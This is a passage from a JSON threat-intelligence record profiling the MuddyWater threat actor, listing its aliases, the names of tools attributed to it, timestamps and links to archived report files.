"main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434288, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e699b65ac7f5c9c09cc5b9bada429369da92fb0e.pdf", "text": "https://archive.orkl.eu/e699b65ac7f5c9c09cc5b9bada429369da92fb0e.txt", "img": "https://archive.orkl.eu/e699b65ac7f5c9c09cc5b9bada429369da92fb0e.jpg" } }